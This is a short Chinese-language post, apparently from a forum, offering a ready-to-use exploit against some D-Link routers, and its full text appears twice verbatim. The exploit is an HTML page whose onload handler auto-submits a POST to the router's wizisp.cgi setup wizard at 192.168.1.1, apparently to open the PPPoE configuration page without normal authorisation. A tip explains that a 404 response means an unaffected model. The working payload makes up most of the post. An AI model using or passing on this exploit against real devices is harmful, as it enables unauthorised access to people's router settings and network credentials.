暂时就测试了几款D-Link路由器. 不太确定是否所有或者大部分D-Link都有这个漏洞 把下面代码保存为html文件就可以了 ``` <html> <body onload="javascript:document.forms[0].submit()"> <H2>Redirecting to PPPoE page </H2> <form method="POST" name="form0" action="http://192.168.1.1/wizisp.cgi?quick=1&sntpRefresh=0&wizTmpSntpEnable=0&wizTmpDST=0"> </form> </body> </html> ``` **注**: 如果出现,404 Not Found.The requested URL was not found on this server. 那可能是因为型号不对造成的错误.
暂时就测试了几款D-Link路由器. 不太确定是否所有或者大部分D-Link都有这个漏洞 把下面代码保存为html文件就可以了 ``` <html> <body onload="javascript:document.forms[0].submit()"> <H2>Redirecting to PPPoE page </H2> <form method="POST" name="form0" action="http://192.168.1.1/wizisp.cgi?quick=1&sntpRefresh=0&wizTmpSntpEnable=0&wizTmpDST=0"> </form> </body> </html> ``` **注**: 如果出现,404 Not Found.The requested URL was not found on this server. 那可能是因为型号不对造成的错误.